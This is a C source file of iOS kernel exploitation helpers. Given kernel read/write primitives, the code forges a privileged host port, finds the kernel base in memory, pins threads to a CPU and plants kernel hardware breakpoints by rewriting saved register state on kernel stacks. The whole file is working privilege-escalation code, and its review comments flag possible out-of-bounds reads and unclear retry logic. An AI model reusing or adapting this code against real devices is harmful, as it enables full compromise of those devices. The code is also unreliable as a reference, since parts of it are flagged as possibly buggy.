// build a fake host priv port mach_port_t fake_host_priv() { if (fake_host_priv_port != MACH_PORT_NULL) { return fake_host_priv_port; } // get the address of realhost: uint64_t hostport_addr = find_port(mach_host_self()); uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); // allocate a port mach_port_t port = MACH_PORT_NULL; kern_return_t err; err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); if (err != KERN_SUCCESS) { printf("failed to allocate port\n"); return MACH_PORT_NULL; } // get a send right mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); // locate the port uint64_t port_addr = find_port(port); // change the type of the port #define IKOT_HOST_PRIV 4 #define IO_ACTIVE 0x80000000 wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_HOST_PRIV); // change the space of the port wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel()); // set the kobject wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), realhost); fake_host_priv_port = port; return port; }
// Locate the kernel image base.
//
// Starts from the page containing the kobject of the mach_host_self() port
// and scans downwards one 4k page at a time for a 32-bit 0xfeedfacf magic.
// Returns the address of the first page whose first word matches, or 0 if
// none of the 0x10000 pages examined match.
uint64_t find_kernel_base() {
  uint64_t host_port_kaddr = find_port(mach_host_self());
  uint64_t host_kobject = rk64(host_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));

  // round down to the start of the containing page
  uint64_t candidate = host_kobject & ~0xfffULL;

  // walk down to find the magic:
  int pages_left = 0x10000;
  while (pages_left-- > 0) {
    if (rk32(candidate) == 0xfeedfacf) {
      return candidate;
    }
    candidate -= 0x1000;
  }

  return 0;
}
// this runs on the thread which will execute the target syscall to debug void run_syscall_with_breakpoint(uint64_t bp_address, breakpoint_callback callback, uint32_t syscall_number, uint32_t n_args, ...) { // pin this thread to the target cpu: pin_current_thread(); // set the Kernel Debug Enable bit of MDSCR_EL1: set_MDSCR_EL1_KDE(mach_thread_self()); // MDE will be set by the regular API for us // enable a hw debug breakpoint at bp_address // it won't fire because PSTATE.D will be set, but we'll deal with that in a bit! // set a hardware bp on the thread using the proper API so that all the structures are already set up: struct arm64_debug_state state = {0}; state.bvr[0] = bp_address; #define BCR_BAS_ALL (0xf << 5) #define BCR_E (1 << 0) state.bcr[0] = BCR_BAS_ALL | BCR_E; // enabled kern_return_t err = thread_set_state(mach_thread_self(), ARM_DEBUG_STATE64, (thread_state_t)&state, sizeof(state)/4); // verify that it got set: memset(&state, 0, sizeof(state)); mach_msg_type_number_t count = sizeof(state)/4; err = thread_get_state(mach_thread_self(), ARM_DEBUG_STATE64, (thread_state_t)&state, &count); if (state.bvr[0] != bp_address) { printf("setting the bp address failed\n"); } // now go and find that thread's DebugData where those values are stored. 
uint64_t thread_port_addr = find_port_address(mach_thread_self(), MACH_MSG_TYPE_COPY_SEND); uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); printf("thread_t_addr: %llx\n", thread_t_addr); // read bvr[0] in that thread_t's DebugData: uint64_t DebugData = rk64(thread_t_addr + ACT_DEBUGDATA_OFFSET); //printf("DebugData: %llx\n", DebugData); uint64_t bvr0 = rk64(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bvr[0])); printf("bvr0 read from the DebugData: 0x%llx\n", bvr0); uint32_t bcr0 = rk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0])); printf("bcr0 read from the DebugData: 0x%08x\n", bcr0); // need to manually set this too in the bcr: #define ARM_DBG_CR_MODE_CONTROL_ANY (3 << 1) bcr0 |= ARM_DBG_CR_MODE_CONTROL_ANY; wk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0]), bcr0); printf("set ARM_DBG_CR_MODE_CONTROL_ANY\n"); // returning from the syscall should be enough to set it. struct monitor_args* margs = malloc(sizeof(struct monitor_args)); margs->target_thread_port = mach_thread_self(); margs->breakpoint = bp_address; margs->callback = callback; // spin up a thread to monitor when the bp is hit: pthread_t th; pthread_create(&th, NULL, monitor_thread, (void*)margs); printf("started monitor thread\n"); struct syscall_args sargs = {0}; sargs.number = syscall_number; va_list ap; va_start(ap, n_args); for (int i = 0; i < n_args; i++){ sargs.arg[i] = va_arg(ap, uint64_t); } va_end(ap); // now execute a syscall with PSTATE.D disabled: syscall_complete = 0; do_syscall_with_pstate_d_unmasked(&sargs); syscall_complete = 1; printf("syscall returned\n"); pthread_join(th, NULL); printf("monitor exited\n"); }
// Service kernel hardware-breakpoint hits for the thread named by
// target_thread_port.
//
// target_thread_port: port for the thread executing the syscall being debugged
// looper_pc:          pc value used to recognise the saved state of the
//                     spinning ("looper") code on the target's kernel stack
// breakpoint:         the pc at which the breakpoint is expected to fire; only
//                     used to warn when a different pc is found
// callback:           called with a local copy of the saved register state of
//                     the code which hit the breakpoint; the (possibly
//                     modified) copy is then written back to the kernel
//
// Each iteration of the outer loop handles one hit: find the looper's saved
// state, find the saved state above it on the stack, run the callback on it,
// then redirect the looper's saved pc to KSYMBOL_SLEH_SYNC_EPILOG and yield.
// Returns once syscall_complete is set, or when the looper state can't be
// found on the stack.
void handle_kernel_bp_hits(mach_port_t target_thread_port, uint64_t looper_pc, uint64_t breakpoint, breakpoint_callback callback) {
  // get the target thread's thread_t
  uint64_t thread_port_addr = find_port_address(target_thread_port, MACH_MSG_TYPE_COPY_SEND);
  uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));

  while (1) {
    // kernel address of the looper's saved state, once located
    uint64_t looper_saved_state = 0;
    int found_it = 0;
    while (!found_it) {
      // the syscall thread sets this once the syscall has returned
      if (syscall_complete) {
        return;
      }
      // we've pinned ourself to the same core, so if we're running, it isn't...
      // in some ways this code is very racy, but when we actually have detected that the target
      // thread has hit the breakpoint it should be safe until we restart it
      // and up until then we don't do anything too dangerous...

      // get the kstack pointer
      uint64_t kstackptr = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_KSTACKPTR));

      printf("kstackptr: %llx\n", kstackptr);

      // get the thread_kernel_state
      // the stack lives below kstackptr, and kstackptr itself points to a struct thread_kernel_state:
      // the first bit of that is just an arm_context_t:
      // this is the scheduled-off state
      arm_context_t saved_ksched_state = {0};
      kmemcpy((uint64_t)&saved_ksched_state, kstackptr, sizeof(arm_context_t));

      // get the saved stack pointer
      uint64_t sp = saved_ksched_state.ss.ss_64.sp;
      printf("sp: %llx\n", sp);

      // no saved sp yet: go round again (this retries immediately, without sleeping)
      if (sp == 0) {
        continue;
      }

      // local snapshot of the 128 64-bit words starting at the saved sp
      uint64_t stack[128] = {0};

      // walk up from there and look for the saved state dumped by the fiq:
      // note that it won't be right at the bottom of the stack
      // instead there are the frames for:
      //   ast_taken_kernel       <-- above this is the saved state which will get restored when the hw bp spinner gets rescheduled
      //   thread_block_reason
      //   thread_invoke
      //   machine_switch_context
      //   Switch_context         <-- the frame actually at the bottom of the stack

      // should probably walk those stack frame properly, but this will do...

      // grab the stack
      kmemcpy((uint64_t)&stack[0], sp, sizeof(stack));
      //for (int i = 0; i < 128; i++) {
      //  printf("%016llx\n", stack[i]);
      //}

      // a saved state is recognised by its leading 64-bit word: the flavor in
      // the low 32 bits and the count in the high 32 bits
      for (int i = 0; i < 128; i++) {
        uint64_t flavor_and_count = stack[i];
        if (flavor_and_count != (ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32))) {
          continue;
        }

        // NOTE(review): the snapshot is viewed in place as an arm_context_t;
        // for a match close to the end of stack[] the pc read below would
        // fall outside the 128-entry buffer - confirm this can't happen.
        arm_context_t* saved_state = (arm_context_t*)&stack[i];

        // only accept a saved state which was interrupted at the looper
        if (saved_state->ss.ss_64.pc != looper_pc) {
          continue;
        }

        found_it = 1;
        // translate the index in the local snapshot back to a kernel address
        looper_saved_state = sp + (i*sizeof(uint64_t));
        printf("found the saved state probably at %llx\n", looper_saved_state); // should walk the stack properly..
        break;
      }

      // NOTE(review): the message says we'll try again, but the code returns
      // from the function after the sleep rather than looping - confirm which
      // of the two is intended.
      if (!found_it) {
        printf("unable to find the saved scheduler tick state on the stack, waiting a bit then trying again...\n");
        sleep(1);
        return;
      }

    }

    // now keep walking up and find the saved state for the code which hit the BP:
    // (start just past the looper's state and scan up to 1000 8-byte words,
    // reading each one directly from kernel memory)
    uint64_t bp_hitting_state = looper_saved_state + sizeof(arm_context_t);
    found_it = 0;
    for (int i = 0; i < 1000; i++) {
      uint64_t flavor_and_count = rk64(bp_hitting_state);
      if (flavor_and_count != (ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32))) {
        bp_hitting_state += 8;
        continue;
      }

      arm_context_t bp_context;
      kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t));

      // dump the first 40 64-bit words of the candidate state
      // (this inner i shadows the scan index above)
      for (int i = 0; i < 40; i++) {
        uint64_t* buf = (uint64_t*)&bp_context;
        printf("%016llx\n", buf[i]);
      }

      // an unexpected pc is only reported; the state is still used
      if (bp_context.ss.ss_64.pc != breakpoint) {
        printf("hummm, found an unexpected breakpoint: %llx\n", bp_context.ss.ss_64.pc);
      }

      found_it = 1;
      break;
    }

    // NOTE(review): on failure this only logs; the code below still reads,
    // passes to the callback and writes back whatever lies at
    // bp_hitting_state (by then 1000 words past the starting point) -
    // confirm that is acceptable.
    if (!found_it) {
      printf("unable to find bp hitting state\n");
    }

    // fix up the bp hitting state so it will continue (with whatever modifications we want:)

    // get a copy of the state:
    arm_context_t bp_context;
    kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t));

    // let the caller inspect and modify the local copy
    callback(&bp_context);

    // write that new state back:
    kmemcpy(bp_hitting_state, (uint64_t)&bp_context, sizeof(arm_context_t));

    // unblock the looper:
    wk64(looper_saved_state + offsetof(arm_context_t, ss.ss_64.pc), ksym(KSYMBOL_SLEH_SYNC_EPILOG));

    // when it runs again it should break out of the loop and continue the syscall

    // forces us off the core and hopefully it on:
    thread_switch(target_thread_port, 0, 0);
    swtch_pri(0);
  }
}
// pin the current thread to a processor, returns a pointer to the processor we're pinned to uint64_t pin_current_thread() { // get the current thread_t: uint64_t th = current_thread(); #if 0 // get the processor_t this thread last ran on uint64_t processor = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR)); printf("thread %llx last ran on %llx, pinning it to that core\n", th, processor); // this is probably fine... wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); #endif // need the struct cpu_data for that processor which is stored in the CpuDataEntries array, declared in data.s // it's 6*4k in to the data segment uint64_t cpu_data_entries = ksym(KSYMBOL_CPU_DATA_ENTRIES); int cpu_id = 0; // it's an array of cpu_data_entry_t which contains just the 64-bit physical and virtual addresses of struct cpu_data uint64_t cpu_data = rk64(cpu_data_entries + ((cpu_id * 0x10) + 8)); uint64_t processor = rk64(cpu_data + koffset(KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR)); printf("trying to pin to cpu0: %llx\n", processor); // pin to that cpu // this is probably fine... 
wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); // that binding will only take account once we get scheduled off and back on again so yield the cpu: printf("pin_current_thread yielding cpu\n"); swtch_pri(0); printf("pin_current_thread back on cpu\n"); uint64_t chosen = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); printf("running on %llx\n", chosen); #if 0 // should now be running on the chosen processor, and should only get scheduled on there: printf("we're running again!\n"); int got_switched = 0; for (int i = 0; i < 1000; i++) { swtch_pri(0); uint64_t p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); if (p != processor) { printf("got moved off target processor\n"); got_switched = 1; break; } usleep(15000); p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); if (p != processor) { printf("got moved off target processor\n"); got_switched = 1; break; } } if (!got_switched) { printf("looks like pinning works!\n"); } #endif return processor; }
uint64_t current_thread() { uint64_t thread_port = find_port(mach_thread_self()); return rk64(thread_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); }
// Return the 64-bit value stored in the ip_receiver field of the port at
// task_self_addr().
// NOTE(review): the name implies this value is the kernel's ipc_space -
// confirm against task_self_addr().
uint64_t ipc_space_kernel() {
  uint64_t self_port_kaddr = task_self_addr();
  uint64_t receiver_field = self_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER);
  return rk64(receiver_field);
}